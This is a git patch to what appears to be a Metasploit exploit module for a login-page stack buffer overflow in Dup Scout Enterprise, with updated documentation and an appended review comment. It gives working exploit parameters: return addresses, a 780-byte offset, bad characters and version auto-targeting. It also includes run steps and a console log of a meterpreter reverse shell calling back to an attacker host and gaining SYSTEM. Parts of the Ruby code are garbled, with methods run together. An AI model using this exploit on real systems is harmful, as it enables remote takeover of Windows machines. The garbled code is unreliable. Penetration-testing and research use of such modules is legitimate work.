From f89d67df1931022ea2e96dd54948afdbff4b0ba4 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Thu, 25 Feb 2021 17:14:25 +0000
Subject: [PATCH] dup_scout_enterprise_login_bof: Add v9.9.14 target and auto targeting
---
 .../http/dup_scout_enterprise_login_bof.md | 89 +++++---
 .../http/dup_scout_enterprise_login_bof.rb | 192 ++++++++++++------
 2 files changed, 185 insertions(+), 96 deletions(-)
diff --git a/documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md b/documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md
index febc1e85b9d3..fdfda0b0ae5e 100644
--- a/documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md
+++ b/documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md
@@ -1,47 +1,72 @@ ## Vulnerable Application - Tested on Windows 10 x64 +This module exploits a stack buffer overflow in Dup Scout Enterprise +versions <= 10.0.18. The buffer overflow exists via the web interface +during login. This gives NT AUTHORITY\SYSTEM access. - Install the application from the link below and enable the web server by going to Tools -> Advanced Options -> Server -> Enable Web Server on Port. +This module has been tested successfully on Dup Scout Enterprise +versions: - [Dup Scout Enterprise v 10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe) +* 9.9.14 on Windows 7 SP1 (x64) +* 9.9.14 on Windows XP SP0 (x64) +* 10.0.18 on Windows 7 SP1 (x64) +* 10.0.18 on Windows XP SP0 (x86) +* 10.0.18 on Windows 10 (1909) (x64) ## Verification Steps - 1. Install the application and set the option above to enable the web server - 2. Start msfconsole - 3. Do: ```use exploit/windows/http/dup_scout_enterprise_login_bof``` - 5. Set options and payload - 6. Do: ```run``` - 7. You should get a shell. +Download: -## Options +* [Dup Scout Enterprise v9.9.14](https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe) +* [Dup Scout Enterprise v10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe) - **RHOST** +Install the application from the link above and enable the web server by going to +Tools -> Advanced Options -> Server -> Enable Web Server on Port. - IP address of the remote host running the server. +Metasploit: - **RPORT** +1. Install the application and set the option above to enable the web server +1. Start msfconsole +1. Do: `use exploit/windows/http/dup_scout_enterprise_login_bof` +1. Do: `set rhosts ` +1. Do: `run` +1. You should get a shell. - Port that the web server is running on. Default is 80 but it can be changed when setting up the program or in the options. 
+## Options ## Scenarios - To obtain a shell: - - ``` -msf > use exploit/windows/http/dup_scout_enterprise_login_bof -msf exploit(windows/http/dup_scout_enterprise_login_bof) > set payload windows/meterpreter/reverse_tcp -payload => windows/meterpreter/reverse_tcp -msf exploit(windows/http/dup_scout_enterprise_login_bof) > set rhost 192.168.1.171 -rhost => 192.168.1.171 -msf exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 192.168.1.252 -lhost => 192.168.1.252 -msf exploit(windows/http/dup_scout_enterprise_login_bof) > run - -[*] Started reverse TCP handler on 192.168.1.252:4444 -[*] Generating exploit... -[*] Triggering the exploit now... -[*] Sending stage (179779 bytes) to 192.168.1.171 -[*] Meterpreter session 1 opened (192.168.1.252:4444 -> 192.168.1.171:58969) at 2017-12-09 02:01:41 -0600 - ``` +### Dup Scout Enterprise version 10.0.18 (x86) on Windows 10 (1909) (x64) + +``` +msf6 > use exploit/windows/http/dup_scout_enterprise_login_bof +[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp +msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set rhosts 172.16.191.199 +rhosts => 172.16.191.199 +msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 172.16.191.192 +lhost => 172.16.191.192 +msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > run + +[*] Started reverse TCP handler on 172.16.191.192:4444 +[*] Executing automatic check (disable AutoCheck to override) +[+] The target appears to be vulnerable. Dup Scout Enterprise version 10.0.18. +[*] Selecting a target... +[*] Using target: Dup Scout Enterprise 10.0.18 (x86) +[*] Generating payload ... +[*] Sending payload (10000 bytes) ... +[*] Sending stage (175174 bytes) to 172.16.191.199 +[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.199:50196) at 2021-02-22 21:14:52 -0500 + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > sysinfo +Computer : DESKTOP-6VPIDIM +OS : Windows 10 (10.0 Build 18363). 
+Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 17 +Meterpreter : x86/windows +meterpreter > +``` + diff --git a/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb b/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb index 0ed698899998..2fee48f72dee 100644 --- a/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb +++ b/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb 
@@ -4,99 +4,163 @@ ##
 class MetasploitModule < Msf::Exploit::Remote
- Rank = ExcellentRanking
+ Rank = GreatRanking
 include Msf::Exploit::Remote::HttpClient
+ prepend Msf::Exploit::Remote::AutoCheck
 def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Dup Scout Enterprise Login Buffer Overflow',
- 'Description' => %q{
- This module exploits a stack buffer overflow in Dup Scout Enterprise
- 10.0.18. The buffer overflow exists via the web interface during
- login. This gives NT AUTHORITY\SYSTEM access.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'Chris Higgins', # msf Module -- @ch1gg1ns
- 'sickness' # Original discovery
- ],
- 'References' =>
- [
- [ 'CVE', '2017-13696' ],
- [ 'EDB', '43145' ]
- ],
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'thread'
+ super(
+ update_info(
+ info,
+ 'Name' => 'Dup Scout Enterprise Login Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in Dup Scout Enterprise
+ versions <= 10.0.18. The buffer overflow exists via the web interface
+ during login. This gives NT AUTHORITY\SYSTEM access.
+
+ This module has been tested successfully on Dup Scout Enterprise
+ versions:
+
+ 9.9.14 on Windows 7 SP1 (x64);
+ 9.9.14 on Windows XP SP0 (x64);
+ 10.0.18 on Windows 7 SP1 (x64);
+ 10.0.18 on Windows XP SP0 (x86); and
+ 10.0.18 on Windows 10 (1909) (x64).
}, - 'Platform' => 'win', - 'Payload' => + 'License' => MSF_LICENSE, + 'Author' => + [ + 'sickness', # Original discovery and exploit + 'Chris Higgins', # msf Module -- @ch1gg1ns + 'bcoles', # Automatic targetting and v9.9.14 target + ], + 'References' => + [ + ['CVE', '2017-13696'], + ['CWE', '121'], + ['EDB', '42557'], + ['EDB', '43145'], + ['EDB', '40832'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d" + }, + 'Targets' => + [ + [ 'Automatic', { 'auto' => true } ], + [ + 'Dup Scout Enterprise 9.9.14 (x86)', + { + # 0x100b5612 : push esp # ret | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- + 'Version' => '9.9.14', + 'Ret' => 0x100b5612, + 'Offset' => 780 + } + ], + [ + 'Dup Scout Enterprise 10.0.18 (x86)', + { + # 0x10090c83 : jmp esp | {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- + 'Version' => '10.0.18', + 'Ret' => 0x10090c83, + 'Offset' => 780 + } + ], + ], + 'Notes' => { - 'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d" + 'Stability' => [ CRASH_SERVICE_DOWN ], + 'SideEffects' => [ IOC_IN_LOGS ], + 'Reliability' => [ REPEATABLE_SESSION ] }, - 'Targets' => - [ - [ 'Dup Scout Enterprise 10.0.18', - { - 'Ret' => 0x10090c83, # jmp esp - libspp.dll - 'Offset' => 780 - } - ], - ], - 'Privileged' => true, - 'DisclosureDate' => '2017-11-14', - 'DefaultTarget' => 0)) + 'Privileged' => true, + 'DisclosureDate' => '2017-11-14', + 'DefaultTarget' => 0 + ) + ) register_options([Opt::RPORT(80)]) - end def check res = send_request_cgi({ - 'uri' => '/', + 'uri' => '/', + 'method' => 'GET' + }) + + unless res + return CheckCode::Unknown('Connection failed.') + end + + version = res.body.scan(/>Dup Scout Enterprise v([\d.]+) '/', 'method' => 'GET' }) - if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/ - return 
Exploit::CheckCode::Appears + unless res + return fail_with(Failure::Unreachable, 'Could not determine Dup Scout Enterprise version. No reply.') end - return Exploit::CheckCode::Safe + res.body.scan(/>Dup Scout Enterprise v([\d.]+) '/login', 'method' => 'POST', - 'content-type' => 'application/x-www-form-urlencoded', - 'content-length' => '17000', - 'data' => sploit + 'vars_post' => { + 'username' => evil, + 'password' => rand_text(10..20) + } }) - - handler - disconnect - end end
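Review bot: `return fail_with(Failure::Unreachable, ...)` in `exploit` wraps a method that raises, so the `return` is dead code; the Metasploit convention is the bare call `fail_with(Failure::Unreachable, 'Could not determine Dup Scout Enterprise version. No reply.')`. The switch from a raw `'data'` body to `'vars_post' => { 'username' => evil, ... }` means, as far as I recall, that `send_request_cgi` percent-encodes the parameter values unless `'encode_params' => false` is passed, so the `%&+=` entries in `BadChars` and the 780-byte `Offset` are relative to the server-side decoded form; a one-line comment above `vars_post` such as `# relies on the client's default parameter encoding; the server decodes before copying` would stop a later maintainer from disabling it or trimming the bad-char list. `check` now returns `CheckCode::Unknown` only when there is no response and no longer looks at `res.code`, so an error page whose body yields an empty `scan` result should map to `CheckCode::Safe` or `CheckCode::Unknown` explicitly; the remainder of `check` and the start of `exploit` are not legible in this extraction, so this may already be handled. The author comment reads `# Automatic targetting` and should be `targeting`.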